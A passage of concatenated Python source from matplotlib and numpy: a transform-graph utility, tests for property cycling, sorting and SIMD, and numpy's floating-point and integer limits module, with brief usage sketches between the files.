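plt.show()                   # FigureManagerGTK4 creates the Gtk.Window and toolbar
```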
#### File: site-packages/matplotlib/_internal_utils.py
```python
from io import StringIO
from pathlib import Path
import subprocess
from matplotlib.transforms import TransformNode
def graphviz_dump_transform(transform, dest, *, highlight=None):
"""
Generate a graphical representation of the transform tree for *transform*
using the :program:`dot` program (which this function depends on). The
output format (png, dot, etc.) is determined from the suffix of *dest*.
Parameters
----------
    transform : `~matplotlib.transforms.Transform`
The represented transform.
dest : str
Output filename. The extension must be one of the formats supported
by :program:`dot`, e.g. png, svg, dot, ...
(see https://www.graphviz.org/doc/info/output.html).
    highlight : list of `~matplotlib.transforms.Transform` or None
The transforms in the tree to be drawn in bold.
If *None*, *transform* is highlighted.
"""
if highlight is None:
highlight = [transform]
seen = set()
def recurse(root, buf):
if id(root) in seen:
return
seen.add(id(root))
props = {}
label = type(root).__name__
if root._invalid:
label = f'[{label}]'
if root in highlight:
props['style'] = 'bold'
props['shape'] = 'box'
props['label'] = '"%s"' % label
props = ' '.join(map('{0[0]}={0[1]}'.format, props.items()))
buf.write(f'{id(root)} [{props}];\n')
for key, val in vars(root).items():
if isinstance(val, TransformNode) and id(root) in val._parents:
buf.write(f'"{id(root)}" -> "{id(val)}" '
f'[label="{key}", fontsize=10];\n')
recurse(val, buf)
buf = StringIO()
buf.write('digraph G {\n')
recurse(transform, buf)
buf.write('}\n')
subprocess.run(
['dot', '-T', Path(dest).suffix[1:], '-o', dest],
input=buf.getvalue().encode('utf-8'), check=True)
```
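A hedged usage sketch for `graphviz_dump_transform`: it assumes the Graphviz `dot` executable is on PATH, and the output filename is purely illustrative.
```python
# Sketch only: dump the transform tree behind an Axes' data transform to a PNG.
import matplotlib.pyplot as plt
from matplotlib._internal_utils import graphviz_dump_transform
fig, ax = plt.subplots()
graphviz_dump_transform(ax.transData, "transdata_tree.png")  # requires `dot`
```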
#### File: matplotlib/tests/test_cycles.py
```python
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
import pytest
from cycler import cycler
def test_colorcycle_basic():
fig, ax = plt.subplots()
ax.set_prop_cycle(cycler('color', ['r', 'g', 'y']))
for _ in range(4):
ax.plot(range(10), range(10))
assert [l.get_color() for l in ax.lines] == ['r', 'g', 'y', 'r']
def test_marker_cycle():
fig, ax = plt.subplots()
ax.set_prop_cycle(cycler('c', ['r', 'g', 'y']) +
cycler('marker', ['.', '*', 'x']))
for _ in range(4):
ax.plot(range(10), range(10))
assert [l.get_color() for l in ax.lines] == ['r', 'g', 'y', 'r']
assert [l.get_marker() for l in ax.lines] == ['.', '*', 'x', '.']
def test_marker_cycle_kwargs_arrays_iterators():
fig, ax = plt.subplots()
ax.set_prop_cycle(c=np.array(['r', 'g', 'y']),
marker=iter(['.', '*', 'x']))
for _ in range(4):
ax.plot(range(10), range(10))
assert [l.get_color() for l in ax.lines] == ['r', 'g', 'y', 'r']
assert [l.get_marker() for l in ax.lines] == ['.', '*', 'x', '.']
def test_linestylecycle_basic():
fig, ax = plt.subplots()
ax.set_prop_cycle(cycler('ls', ['-', '--', ':']))
for _ in range(4):
ax.plot(range(10), range(10))
assert [l.get_linestyle() for l in ax.lines] == ['-', '--', ':', '-']
def test_fillcycle_basic():
fig, ax = plt.subplots()
ax.set_prop_cycle(cycler('c', ['r', 'g', 'y']) +
cycler('hatch', ['xx', 'O', '|-']) +
cycler('linestyle', ['-', '--', ':']))
for _ in range(4):
ax.fill(range(10), range(10))
assert ([p.get_facecolor() for p in ax.patches]
== [mpl.colors.to_rgba(c) for c in ['r', 'g', 'y', 'r']])
assert [p.get_hatch() for p in ax.patches] == ['xx', 'O', '|-', 'xx']
assert [p.get_linestyle() for p in ax.patches] == ['-', '--', ':', '-']
def test_fillcycle_ignore():
fig, ax = plt.subplots()
ax.set_prop_cycle(cycler('color', ['r', 'g', 'y']) +
cycler('hatch', ['xx', 'O', '|-']) +
cycler('marker', ['.', '*', 'D']))
t = range(10)
# Should not advance the cycler, even though there is an
# unspecified property in the cycler "marker".
# "marker" is not a Polygon property, and should be ignored.
ax.fill(t, t, 'r', hatch='xx')
# Allow the cycler to advance, but specify some properties
ax.fill(t, t, hatch='O')
ax.fill(t, t)
ax.fill(t, t)
assert ([p.get_facecolor() for p in ax.patches]
== [mpl.colors.to_rgba(c) for c in ['r', 'r', 'g', 'y']])
assert [p.get_hatch() for p in ax.patches] == ['xx', 'O', 'O', '|-']
def test_property_collision_plot():
fig, ax = plt.subplots()
ax.set_prop_cycle('linewidth', [2, 4])
t = range(10)
for c in range(1, 4):
ax.plot(t, t, lw=0.1)
ax.plot(t, t)
ax.plot(t, t)
assert [l.get_linewidth() for l in ax.lines] == [0.1, 0.1, 0.1, 2, 4]
def test_property_collision_fill():
fig, ax = plt.subplots()
ax.set_prop_cycle(linewidth=[2, 3, 4, 5, 6], facecolor='bgcmy')
t = range(10)
for c in range(1, 4):
ax.fill(t, t, lw=0.1)
ax.fill(t, t)
ax.fill(t, t)
assert ([p.get_facecolor() for p in ax.patches]
== [mpl.colors.to_rgba(c) for c in 'bgcmy'])
assert [p.get_linewidth() for p in ax.patches] == [0.1, 0.1, 0.1, 5, 6]
def test_valid_input_forms():
fig, ax = plt.subplots()
# These should not raise an error.
ax.set_prop_cycle(None)
ax.set_prop_cycle(cycler('linewidth', [1, 2]))
ax.set_prop_cycle('color', 'rgywkbcm')
ax.set_prop_cycle('lw', (1, 2))
ax.set_prop_cycle('linewidth', [1, 2])
ax.set_prop_cycle('linewidth', iter([1, 2]))
ax.set_prop_cycle('linewidth', np.array([1, 2]))
ax.set_prop_cycle('color', np.array([[1, 0, 0],
[0, 1, 0],
[0, 0, 1]]))
ax.set_prop_cycle('dashes', [[], [13, 2], [8, 3, 1, 3]])
ax.set_prop_cycle(lw=[1, 2], color=['k', 'w'], ls=['-', '--'])
ax.set_prop_cycle(lw=np.array([1, 2]),
color=np.array(['k', 'w']),
ls=np.array(['-', '--']))
def test_cycle_reset():
fig, ax = plt.subplots()
# Can't really test a reset because only a cycle object is stored
# but we can test the first item of the cycle.
prop = next(ax._get_lines.prop_cycler)
ax.set_prop_cycle(linewidth=[10, 9, 4])
assert prop != next(ax._get_lines.prop_cycler)
ax.set_prop_cycle(None)
got = next(ax._get_lines.prop_cycler)
assert prop == got
def test_invalid_input_forms():
fig, ax = plt.subplots()
with pytest.raises((TypeError, ValueError)):
ax.set_prop_cycle(1)
with pytest.raises((TypeError, ValueError)):
ax.set_prop_cycle([1, 2])
with pytest.raises((TypeError, ValueError)):
ax.set_prop_cycle('color', 'fish')
with pytest.raises((TypeError, ValueError)):
ax.set_prop_cycle('linewidth', 1)
with pytest.raises((TypeError, ValueError)):
ax.set_prop_cycle('linewidth', {1, 2})
with pytest.raises((TypeError, ValueError)):
ax.set_prop_cycle(linewidth=1, color='r')
with pytest.raises((TypeError, ValueError)):
ax.set_prop_cycle('foobar', [1, 2])
with pytest.raises((TypeError, ValueError)):
ax.set_prop_cycle(foobar=[1, 2])
with pytest.raises((TypeError, ValueError)):
ax.set_prop_cycle(cycler(foobar=[1, 2]))
with pytest.raises(ValueError):
ax.set_prop_cycle(cycler(color='rgb', c='cmy'))
```
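The tests above compose cyclers with `+`; as a quick reference sketch, `+` zips cyclers of equal length while `*` forms their outer product (this is the documented behaviour of the `cycler` package).
```python
from cycler import cycler
zipped = cycler(color=['r', 'g', 'b']) + cycler(ls=['-', '--', ':'])   # 3 styles
outer = cycler(color=['r', 'g']) * cycler(ls=['-', '--'])              # 4 styles
print(len(zipped), len(outer))   # 3 4
print(list(zipped)[0])           # one dict combining both keys, e.g. color 'r', ls '-'
```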
#### File: matplotlib/tests/test_ttconv.py
```python
from pathlib import Path
import matplotlib
from matplotlib.testing.decorators import image_comparison
import matplotlib.pyplot as plt
@image_comparison(["truetype-conversion.pdf"])
# mpltest.ttf does not have "l"/"p" glyphs so we get a warning when trying to
# get the font extents.
def test_truetype_conversion(recwarn):
matplotlib.rcParams['pdf.fonttype'] = 3
fig, ax = plt.subplots()
ax.text(0, 0, "ABCDE",
font=Path(__file__).with_name("mpltest.ttf"), fontsize=80)
ax.set_xticks([])
ax.set_yticks([])
```
#### File: array_api/tests/test_sorting_functions.py
```python
import pytest
from numpy import array_api as xp
@pytest.mark.parametrize(
"obj, axis, expected",
[
([0, 0], -1, [0, 1]),
([0, 1, 0], -1, [1, 0, 2]),
([[0, 1], [1, 1]], 0, [[1, 0], [0, 1]]),
([[0, 1], [1, 1]], 1, [[1, 0], [0, 1]]),
],
)
def test_stable_desc_argsort(obj, axis, expected):
"""
Indices respect relative order of a descending stable-sort
See https://github.com/numpy/numpy/issues/20778
"""
x = xp.asarray(obj)
out = xp.argsort(x, axis=axis, stable=True, descending=True)
assert xp.all(out == xp.asarray(expected))
```
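For intuition about what the test above asserts, here is a plain-NumPy sketch; negating the data is just one way to reproduce a stable descending sort for numeric input, and is not necessarily how the `array_api` wrapper implements it.
```python
import numpy as np
x = np.array([0, 1, 0])
idx = np.argsort(-x, kind="stable")   # descending order, ties keep original order
print(idx)                            # [1 0 2]: the two zeros stay in index order
```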
#### File: numpy/core/getlimits.py
```python
__all__ = ['finfo', 'iinfo']
import warnings
from ._machar import MachAr
from .overrides import set_module
from . import numeric
from . import numerictypes as ntypes
from .numeric import array, inf, NaN
from .umath import log10, exp2, nextafter, isnan
def _fr0(a):
"""fix rank-0 --> rank-1"""
if a.ndim == 0:
a = a.copy()
a.shape = (1,)
return a
def _fr1(a):
"""fix rank > 0 --> rank-0"""
if a.size == 1:
a = a.copy()
a.shape = ()
return a
class MachArLike:
""" Object to simulate MachAr instance """
def __init__(self, ftype, *, eps, epsneg, huge, tiny,
ibeta, smallest_subnormal=None, **kwargs):
self.params = _MACHAR_PARAMS[ftype]
self.ftype = ftype
self.title = self.params['title']
# Parameter types same as for discovered MachAr object.
if not smallest_subnormal:
self._smallest_subnormal = nextafter(
self.ftype(0), self.ftype(1), dtype=self.ftype)
else:
self._smallest_subnormal = smallest_subnormal
self.epsilon = self.eps = self._float_to_float(eps)
self.epsneg = self._float_to_float(epsneg)
self.xmax = self.huge = self._float_to_float(huge)
self.xmin = self._float_to_float(tiny)
self.smallest_normal = self.tiny = self._float_to_float(tiny)
self.ibeta = self.params['itype'](ibeta)
self.__dict__.update(kwargs)
self.precision = int(-log10(self.eps))
self.resolution = self._float_to_float(
self._float_conv(10) ** (-self.precision))
self._str_eps = self._float_to_str(self.eps)
self._str_epsneg = self._float_to_str(self.epsneg)
self._str_xmin = self._float_to_str(self.xmin)
self._str_xmax = self._float_to_str(self.xmax)
self._str_resolution = self._float_to_str(self.resolution)
self._str_smallest_normal = self._float_to_str(self.xmin)
@property
def smallest_subnormal(self):
"""Return the value for the smallest subnormal.
Returns
-------
smallest_subnormal : float
value for the smallest subnormal.
Warns
-----
UserWarning
If the calculated value for the smallest subnormal is zero.
"""
# Check that the calculated value is not zero, in case it raises a
# warning.
value = self._smallest_subnormal
if self.ftype(0) == value:
warnings.warn(
'The value of the smallest subnormal for {} type '
'is zero.'.format(self.ftype), UserWarning, stacklevel=2)
return self._float_to_float(value)
@property
def _str_smallest_subnormal(self):
"""Return the string representation of the smallest subnormal."""
return self._float_to_str(self.smallest_subnormal)
def _float_to_float(self, value):
"""Converts float to float.
Parameters
----------
value : float
value to be converted.
"""
return _fr1(self._float_conv(value))
def _float_conv(self, value):
"""Converts float to conv.
Parameters
----------
value : float
value to be converted.
"""
return array([value], self.ftype)
def _float_to_str(self, value):
"""Converts float to str.
Parameters
----------
value : float
value to be converted.
"""
return self.params['fmt'] % array(_fr0(value)[0], self.ftype)
_convert_to_float = {
ntypes.csingle: ntypes.single,
ntypes.complex_: ntypes.float_,
ntypes.clongfloat: ntypes.longfloat
}
# Parameters for creating MachAr / MachAr-like objects
_title_fmt = 'numpy {} precision floating point number'
_MACHAR_PARAMS = {
ntypes.double: dict(
itype = ntypes.int64,
fmt = '%24.16e',
title = _title_fmt.format('double')),
ntypes.single: dict(
itype = ntypes.int32,
fmt = '%15.7e',
title = _title_fmt.format('single')),
ntypes.longdouble: dict(
itype = ntypes.longlong,
fmt = '%s',
title = _title_fmt.format('long double')),
ntypes.half: dict(
itype = ntypes.int16,
fmt = '%12.5e',
title = _title_fmt.format('half'))}
# Key to identify the floating point type. Key is result of
# ftype('-0.1').newbyteorder('<').tobytes()
# See:
# https://perl5.git.perl.org/perl.git/blob/3118d7d684b56cbeb702af874f4326683c45f045:/Configure
_KNOWN_TYPES = {}
def _register_type(machar, bytepat):
_KNOWN_TYPES[bytepat] = machar
_float_ma = {}
def _register_known_types():
# Known parameters for float16
# See docstring of MachAr class for description of parameters.
f16 = ntypes.float16
float16_ma = MachArLike(f16,
machep=-10,
negep=-11,
minexp=-14,
maxexp=16,
it=10,
iexp=5,
ibeta=2,
irnd=5,
ngrd=0,
eps=exp2(f16(-10)),
epsneg=exp2(f16(-11)),
huge=f16(65504),
tiny=f16(2 ** -14))
_register_type(float16_ma, b'f\xae')
_float_ma[16] = float16_ma
# Known parameters for float32
f32 = ntypes.float32
float32_ma = MachArLike(f32,
machep=-23,
negep=-24,
minexp=-126,
maxexp=128,
it=23,
iexp=8,
ibeta=2,
irnd=5,
ngrd=0,
eps=exp2(f32(-23)),
epsneg=exp2(f32(-24)),
huge=f32((1 - 2 ** -24) * 2**128),
tiny=exp2(f32(-126)))
_register_type(float32_ma, b'\xcd\xcc\xcc\xbd')
_float_ma[32] = float32_ma
# Known parameters for float64
f64 = ntypes.float64
epsneg_f64 = 2.0 ** -53.0
tiny_f64 = 2.0 ** -1022.0
float64_ma = MachArLike(f64,
machep=-52,
negep=-53,
minexp=-1022,
maxexp=1024,
it=52,
iexp=11,
ibeta=2,
irnd=5,
ngrd=0,
eps=2.0 ** -52.0,
epsneg=epsneg_f64,
huge=(1.0 - epsneg_f64) / tiny_f64 * f64(4),
tiny=tiny_f64)
_register_type(float64_ma, b'\x9a\x99\x99\x99\x99\x99\xb9\xbf')
_float_ma[64] = float64_ma
# Known parameters for IEEE 754 128-bit binary float
ld = ntypes.longdouble
epsneg_f128 = exp2(ld(-113))
tiny_f128 = exp2(ld(-16382))
# Ignore runtime error when this is not f128
with numeric.errstate(all='ignore'):
huge_f128 = (ld(1) - epsneg_f128) / tiny_f128 * ld(4)
float128_ma = MachArLike(ld,
machep=-112,
negep=-113,
minexp=-16382,
maxexp=16384,
it=112,
iexp=15,
ibeta=2,
irnd=5,
ngrd=0,
eps=exp2(ld(-112)),
epsneg=epsneg_f128,
huge=huge_f128,
tiny=tiny_f128)
# IEEE 754 128-bit binary float
_register_type(float128_ma,
b'\x9a\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\xfb\xbf')
_float_ma[128] = float128_ma
# Known parameters for float80 (Intel 80-bit extended precision)
epsneg_f80 = exp2(ld(-64))
tiny_f80 = exp2(ld(-16382))
# Ignore runtime error when this is not f80
with numeric.errstate(all='ignore'):
huge_f80 = (ld(1) - epsneg_f80) / tiny_f80 * ld(4)
float80_ma = MachArLike(ld,
machep=-63,
negep=-64,
minexp=-16382,
maxexp=16384,
it=63,
iexp=15,
ibeta=2,
irnd=5,
ngrd=0,
eps=exp2(ld(-63)),
epsneg=epsneg_f80,
huge=huge_f80,
tiny=tiny_f80)
# float80, first 10 bytes containing actual storage
_register_type(float80_ma, b'\xcd\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xfb\xbf')
_float_ma[80] = float80_ma
# Guessed / known parameters for double double; see:
# https://en.wikipedia.org/wiki/Quadruple-precision_floating-point_format#Double-double_arithmetic
# These numbers have the same exponent range as float64, but extended number of
# digits in the significand.
huge_dd = nextafter(ld(inf), ld(0), dtype=ld)
# As the smallest_normal in double double is so hard to calculate we set
# it to NaN.
smallest_normal_dd = NaN
# Leave the same value for the smallest subnormal as double
smallest_subnormal_dd = ld(nextafter(0., 1.))
float_dd_ma = MachArLike(ld,
machep=-105,
negep=-106,
minexp=-1022,
maxexp=1024,
it=105,
iexp=11,
ibeta=2,
irnd=5,
ngrd=0,
eps=exp2(ld(-105)),
epsneg=exp2(ld(-106)),
huge=huge_dd,
tiny=smallest_normal_dd,
smallest_subnormal=smallest_subnormal_dd)
# double double; low, high order (e.g. PPC 64)
_register_type(float_dd_ma,
b'\x9a\x99\x99\x99\x99\x99Y<\x9a\x99\x99\x99\x99\x99\xb9\xbf')
# double double; high, low order (e.g. PPC 64 le)
_register_type(float_dd_ma,
b'\x9a\x99\x99\x99\x99\x99\xb9\xbf\x9a\x99\x99\x99\x99\x99Y<')
_float_ma['dd'] = float_dd_ma
def _get_machar(ftype):
""" Get MachAr instance or MachAr-like instance
Get parameters for floating point type, by first trying signatures of
various known floating point types, then, if none match, attempting to
identify parameters by analysis.
Parameters
----------
ftype : class
Numpy floating point type class (e.g. ``np.float64``)
Returns
-------
ma_like : instance of :class:`MachAr` or :class:`MachArLike`
Object giving floating point parameters for `ftype`.
Warns
-----
UserWarning
If the binary signature of the float type is not in the dictionary of
known float types.
"""
params = _MACHAR_PARAMS.get(ftype)
if params is None:
raise ValueError(repr(ftype))
# Detect known / suspected types
key = ftype('-0.1').newbyteorder('<').tobytes()
ma_like = None
if ftype == ntypes.longdouble:
# Could be 80 bit == 10 byte extended precision, where last bytes can
# be random garbage.
# Comparing first 10 bytes to pattern first to avoid branching on the
# random garbage.
ma_like = _KNOWN_TYPES.get(key[:10])
if ma_like is None:
ma_like = _KNOWN_TYPES.get(key)
if ma_like is not None:
return ma_like
# Fall back to parameter discovery
warnings.warn(
'Signature {} for {} does not match any known type: '
'falling back to type probe function'.format(key, ftype),
UserWarning, stacklevel=2)
return _discovered_machar(ftype)
def _discovered_machar(ftype):
""" Create MachAr instance with found information on float types
"""
params = _MACHAR_PARAMS[ftype]
return MachAr(lambda v: array([v], ftype),
lambda v:_fr0(v.astype(params['itype']))[0],
lambda v:array(_fr0(v)[0], ftype),
lambda v: params['fmt'] % array(_fr0(v)[0], ftype),
params['title'])
@set_module('numpy')
class finfo:
"""
finfo(dtype)
Machine limits for floating point types.
Attributes
----------
bits : int
The number of bits occupied by the type.
eps : float
The difference between 1.0 and the next smallest representable float
larger than 1.0. For example, for 64-bit binary floats in the IEEE-754
standard, ``eps = 2**-52``, approximately 2.22e-16.
epsneg : float
The difference between 1.0 and the next smallest representable float
less than 1.0. For example, for 64-bit binary floats in the IEEE-754
standard, ``epsneg = 2**-53``, approximately 1.11e-16.
iexp : int
The number of bits in the exponent portion of the floating point
representation.
machar : MachAr
The object which calculated these parameters and holds more
detailed information.
.. deprecated:: 1.22
machep : int
The exponent that yields `eps`.
max : floating point number of the appropriate type
The largest representable number.
maxexp : int
The smallest positive power of the base (2) that causes overflow.
min : floating point number of the appropriate type
The smallest representable number, typically ``-max``.
minexp : int
The most negative power of the base (2) consistent with there
being no leading 0's in the mantissa.
negep : int
The exponent that yields `epsneg`.
nexp : int
The number of bits in the exponent including its sign and bias.
nmant : int
The number of bits in the mantissa.
precision : int
The approximate number of decimal digits to which this kind of
float is precise.
resolution : floating point number of the appropriate type
The approximate decimal resolution of this type, i.e.,
``10**-precision``.
tiny : float
An alias for `smallest_normal`, kept for backwards compatibility.
smallest_normal : float
The smallest positive floating point number with 1 as leading bit in
the mantissa following IEEE-754 (see Notes).
smallest_subnormal : float
The smallest positive floating point number with 0 as leading bit in
the mantissa following IEEE-754.
Parameters
----------
dtype : float, dtype, or instance
Kind of floating point data-type about which to get information.
See Also
--------
MachAr : The implementation of the tests that produce this information.
iinfo : The equivalent for integer data types.
spacing : The distance between a value and the nearest adjacent number
nextafter : The next floating point value after x1 towards x2
Notes
-----
For developers of NumPy: do not instantiate this at the module level.
The initial calculation of these parameters is expensive and negatively
impacts import times. These objects are cached, so calling ``finfo()``
repeatedly inside your functions is not a problem.
Note that ``smallest_normal`` is not actually the smallest positive
representable value in a NumPy floating point type. As in the IEEE-754
standard [1]_, NumPy floating point types make use of subnormal numbers to
fill the gap between 0 and ``smallest_normal``. However, subnormal numbers
may have significantly reduced precision [2]_.
References
----------
.. [1] IEEE Standard for Floating-Point Arithmetic, IEEE Std 754-2008,
pp.1-70, 2008, http://www.doi.org/10.1109/IEEESTD.2008.4610935
.. [2] Wikipedia, "Denormal Numbers",
https://en.wikipedia.org/wiki/Denormal_number
"""
_finfo_cache = {}
def __new__(cls, dtype):
try:
dtype = numeric.dtype(dtype)
except TypeError:
# In case a float instance was given
dtype = numeric.dtype(type(dtype))
obj = cls._finfo_cache.get(dtype, None)
if obj is not None:
return obj
dtypes = [dtype]
newdtype = numeric.obj2sctype(dtype)
if newdtype is not dtype:
dtypes.append(newdtype)
dtype = newdtype
if not issubclass(dtype, numeric.inexact):
raise ValueError("data type %r not inexact" % (dtype))
obj = cls._finfo_cache.get(dtype, None)
if obj is not None:
return obj
if not issubclass(dtype, numeric.floating):
newdtype = _convert_to_float[dtype]
if newdtype is not dtype:
dtypes.append(newdtype)
dtype = newdtype
obj = cls._finfo_cache.get(dtype, None)
if obj is not None:
return obj
obj = object.__new__(cls)._init(dtype)
for dt in dtypes:
cls._finfo_cache[dt] = obj
return obj
def _init(self, dtype):
self.dtype = numeric.dtype(dtype)
machar = _get_machar(dtype)
for word in ['precision', 'iexp',
'maxexp', 'minexp', 'negep',
'machep']:
setattr(self, word, getattr(machar, word))
for word in ['resolution', 'epsneg', 'smallest_subnormal']:
setattr(self, word, getattr(machar, word).flat[0])
self.bits = self.dtype.itemsize * 8
self.max = machar.huge.flat[0]
self.min = -self.max
self.eps = machar.eps.flat[0]
self.nexp = machar.iexp
self.nmant = machar.it
self._machar = machar
self._str_tiny = machar._str_xmin.strip()
self._str_max = machar._str_xmax.strip()
self._str_epsneg = machar._str_epsneg.strip()
self._str_eps = machar._str_eps.strip()
self._str_resolution = machar._str_resolution.strip()
self._str_smallest_normal = machar._str_smallest_normal.strip()
self._str_smallest_subnormal = machar._str_smallest_subnormal.strip()
return self
def __str__(self):
fmt = (
'Machine parameters for %(dtype)s\n'
'---------------------------------------------------------------\n'
'precision = %(precision)3s resolution = %(_str_resolution)s\n'
'machep = %(machep)6s eps = %(_str_eps)s\n'
'negep = %(negep)6s epsneg = %(_str_epsneg)s\n'
'minexp = %(minexp)6s tiny = %(_str_tiny)s\n'
'maxexp = %(maxexp)6s max = %(_str_max)s\n'
'nexp = %(nexp)6s min = -max\n'
'smallest_normal = %(_str_smallest_normal)s '
'smallest_subnormal = %(_str_smallest_subnormal)s\n'
'---------------------------------------------------------------\n'
)
return fmt % self.__dict__
def __repr__(self):
c = self.__class__.__name__
d = self.__dict__.copy()
d['klass'] = c
return (("%(klass)s(resolution=%(resolution)s, min=-%(_str_max)s,"
" max=%(_str_max)s, dtype=%(dtype)s)") % d)
@property
def smallest_normal(self):
"""Return the value for the smallest normal.
Returns
-------
smallest_normal : float
Value for the smallest normal.
Warns
-----
UserWarning
If the calculated value for the smallest normal is requested for
double-double.
"""
# This check is necessary because the value for smallest_normal is
# platform dependent for longdouble types.
if isnan(self._machar.smallest_normal.flat[0]):
warnings.warn(
'The value of smallest normal is undefined for double double',
UserWarning, stacklevel=2)
return self._machar.smallest_normal.flat[0]
@property
def tiny(self):
"""Return the value for tiny, alias of smallest_normal.
Returns
-------
tiny : float
Value for the smallest normal, alias of smallest_normal.
Warns
-----
UserWarning
If the calculated value for the smallest normal is requested for
double-double.
"""
return self.smallest_normal
@property
def machar(self):
"""The object which calculated these parameters and holds more
detailed information.
.. deprecated:: 1.22
"""
# Deprecated 2021-10-27, NumPy 1.22
warnings.warn(
"`finfo.machar` is deprecated (NumPy 1.22)",
DeprecationWarning, stacklevel=2,
)
return self._machar
@set_module('numpy')
class iinfo:
"""
iinfo(type)
Machine limits for integer types.
Attributes
----------
bits : int
The number of bits occupied by the type.
min : int
The smallest integer expressible by the type.
max : int
The largest integer expressible by the type.
Parameters
----------
int_type : integer type, dtype, or instance
The kind of integer data type to get information about.
See Also
--------
finfo : The equivalent for floating point data types.
Examples
--------
With types:
>>> ii16 = np.iinfo(np.int16)
>>> ii16.min
-32768
>>> ii16.max
32767
>>> ii32 = np.iinfo(np.int32)
>>> ii32.min
-2147483648
>>> ii32.max
2147483647
With instances:
>>> ii32 = np.iinfo(np.int32(10))
>>> ii32.min
-2147483648
>>> ii32.max
2147483647
"""
_min_vals = {}
_max_vals = {}
def __init__(self, int_type):
try:
self.dtype = numeric.dtype(int_type)
except TypeError:
self.dtype = numeric.dtype(type(int_type))
self.kind = self.dtype.kind
self.bits = self.dtype.itemsize * 8
self.key = "%s%d" % (self.kind, self.bits)
if self.kind not in 'iu':
raise ValueError("Invalid integer data type %r." % (self.kind,))
@property
def min(self):
"""Minimum value of given dtype."""
if self.kind == 'u':
return 0
else:
try:
val = iinfo._min_vals[self.key]
except KeyError:
val = int(-(1 << (self.bits-1)))
iinfo._min_vals[self.key] = val
return val
@property
def max(self):
"""Maximum value of given dtype."""
try:
val = iinfo._max_vals[self.key]
except KeyError:
if self.kind == 'u':
val = int((1 << self.bits) - 1)
else:
val = int((1 << (self.bits-1)) - 1)
iinfo._max_vals[self.key] = val
return val
def __str__(self):
"""String representation."""
fmt = (
'Machine parameters for %(dtype)s\n'
'---------------------------------------------------------------\n'
'min = %(min)s\n'
'max = %(max)s\n'
'---------------------------------------------------------------\n'
)
return fmt % {'dtype': self.dtype, 'min': self.min, 'max': self.max}
def __repr__(self):
return "%s(min=%s, max=%s, dtype=%s)" % (self.__class__.__name__,
self.min, self.max, self.dtype)
```
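A quick sanity check of the two public classes defined above; the printed values are the standard IEEE-754 binary64 and int16 limits and should hold on any conforming platform.
```python
import numpy as np
fi = np.finfo(np.float64)
print(fi.eps)               # 2.220446049250313e-16 (2**-52)
print(fi.smallest_normal)   # 2.2250738585072014e-308 (2**-1022)
ii = np.iinfo(np.int16)
print(ii.min, ii.max)       # -32768 32767
```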
#### File: core/tests/test_simd_module.py
```python
import pytest
from numpy.core._simd import targets
"""
This test unit only checks the sanity of the common functionality, so all we
need is to take one submodule that represents any of the enabled SIMD
extensions and run the tests against it; a second submodule is required only
for the single check related to mixing data types across submodules.
"""
npyvs = [npyv_mod for npyv_mod in targets.values() if npyv_mod and npyv_mod.simd]
npyv, npyv2 = (npyvs + [None, None])[:2]
unsigned_sfx = ["u8", "u16", "u32", "u64"]
signed_sfx = ["s8", "s16", "s32", "s64"]
fp_sfx = ["f32"]
if npyv and npyv.simd_f64:
fp_sfx.append("f64")
int_sfx = unsigned_sfx + signed_sfx
all_sfx = unsigned_sfx + int_sfx
@pytest.mark.skipif(not npyv, reason="could not find any SIMD extension with NPYV support")
class Test_SIMD_MODULE:
@pytest.mark.parametrize('sfx', all_sfx)
def test_num_lanes(self, sfx):
nlanes = getattr(npyv, "nlanes_" + sfx)
vector = getattr(npyv, "setall_" + sfx)(1)
assert len(vector) == nlanes
@pytest.mark.parametrize('sfx', all_sfx)
def test_type_name(self, sfx):
vector = getattr(npyv, "setall_" + sfx)(1)
assert vector.__name__ == "npyv_" + sfx
def test_raises(self):
a, b = [npyv.setall_u32(1)]*2
for sfx in all_sfx:
vcb = lambda intrin: getattr(npyv, f"{intrin}_{sfx}")
pytest.raises(TypeError, vcb("add"), a)
pytest.raises(TypeError, vcb("add"), a, b, a)
pytest.raises(TypeError, vcb("setall"))
pytest.raises(TypeError, vcb("setall"), [1])
pytest.raises(TypeError, vcb("load"), 1)
pytest.raises(ValueError, vcb("load"), [1])
pytest.raises(ValueError, vcb("store"), [1], getattr(npyv, f"reinterpret_{sfx}_u32")(a))
@pytest.mark.skipif(not npyv2, reason=(
"could not find a second SIMD extension with NPYV support"
))
def test_nomix(self):
# mix among submodules isn't allowed
a = npyv.setall_u32(1)
a2 = npyv2.setall_u32(1)
pytest.raises(TypeError, npyv.add_u32, a2, a2)
pytest.raises(TypeError, npyv2.add_u32, a, a)
@pytest.mark.parametrize('sfx', unsigned_sfx)
def test_unsigned_overflow(self, sfx):
nlanes = getattr(npyv, "nlanes_" + sfx)
maxu = (1 << int(sfx[1:])) - 1
maxu_72 = (1 << 72) - 1
lane = getattr(npyv, "setall_" + sfx)(maxu_72)[0]
assert lane == maxu
lanes = getattr(npyv, "load_" + sfx)([maxu_72] * nlanes)
assert lanes == [maxu] * nlanes
lane = getattr(npyv, "setall_" + sfx)(-1)[0]
assert lane == maxu
lanes = getattr(npyv, "load_" + sfx)([-1] * nlanes)
assert lanes == [maxu] * nlanes
@pytest.mark.parametrize('sfx', signed_sfx)
def test_signed_overflow(self, sfx):
nlanes = getattr(npyv, "nlanes_" + sfx)
maxs_72 = (1 << 71) - 1
lane = getattr(npyv, "setall_" + sfx)(maxs_72)[0]
assert lane == -1
lanes = getattr(npyv, "load_" + sfx)([maxs_72] * nlanes)
assert lanes == [-1] * nlanes
mins_72 = -1 << 71
lane = getattr(npyv, "setall_" + sfx)(mins_72)[0]
assert lane == 0
lanes = getattr(npyv, "load_" + sfx)([mins_72] * nlanes)
assert lanes == [0] * nlanes
def test_truncate_f32(self):
f32 = npyv.setall_f32(0.1)[0]
assert f32 != 0.1
assert round(f32, 1) == 0.1
def test_compare(self):
data_range = range(0, npyv.nlanes_u32)
vdata = npyv.load_u32(data_range)
assert vdata == list(data_range)
assert vdata == tuple(data_range)
for i in data_range:
assert vdata[i] == data_range[i]
```
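As a hedged aside, the private module these tests exercise can be inspected directly; whether any target is populated depends entirely on how the local NumPy build was compiled.
```python
from numpy.core._simd import targets
# Names of the SIMD extensions this NumPy build actually exposes (may be empty).
print([name for name, mod in targets.items() if mod and mod.simd])
```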
#### File: distutils/fcompiler/nv.py
```python
from numpy.distutils.fcompiler import FCompiler
compilers = ['NVHPCFCompiler']
class NVHPCFCompiler(FCompiler):
